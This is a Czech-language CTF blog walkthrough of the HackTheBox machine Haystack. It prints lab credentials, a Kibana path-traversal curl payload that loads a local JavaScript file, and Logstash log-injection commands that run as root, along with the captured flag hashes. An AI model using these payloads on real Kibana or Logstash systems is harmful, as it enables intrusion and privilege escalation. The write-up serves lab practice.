tom@home.htb:~$

Blog o HTB

2 December 2020

Haystack

Úvod a kontext

Haystack stojí hlavně na vazbě mezi Kibana/Elastic vrstvou a lokálním Logstash workflow. Účet security s heslem spanish.is.key je jen vstupní bod; skutečně zajímavé je až to, co se dá dělat z hostu na 127.0.0.1:5601 a v adresáři /opt/kibana.

Root zde nepadá na další veřejné CVE, ale na provozní automatice. Kibana API umí načíst lokální /tmp/tm.js a Logstash pak slepě zpracuje obsah logstash_tm.log a logstash_tm2.log, z něhož vykonává příkazy jako root.

Získání přístupu

Účet security

V zachycené části řetězce už první použitelný přístup začíná hotovými údaji security / spanish.is.key. Tím se otevírá běžný shell a možnost pracovat s lokální Kibana vrstvou.

user: security
pass: spanish.is.key
user: 04d18bc79dac1d4d48ee0a940c8eb929

Eskalace oprávnění

Získání root flagu

Lokální Kibana API na 127.0.0.1:5601 dovolí načíst vlastní /tmp/tm.js. Samotný root pak neotevře další exploit Elasticsearch, ale workflow nad logstash_tm.log a logstash_tm2.log, které z řádků Ejecutar comando: vykonává příkazy jako root.

curl "http://127.0.0.1:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/tm.js"
Pomcka: http://grokdebug.herokuapp.com/
echo "Ejecutar comando: cp /root/root.txt /tmp/root.txt" > /opt/kibana/logstash_tm.log
echo "Ejecutar comando: chown security: /tmp/root.txt" > /opt/kibana/logstash_tm2.log
root: 3f5f727c38d9f70e1d2ad2ba11059d92

Shrnutí klíčových poznatků

Co si odnést do praxe

Další související články

HTB Stroje

Techniky

Nástroje

tags: ssh - exploit - enumeration - privesc - hackthebox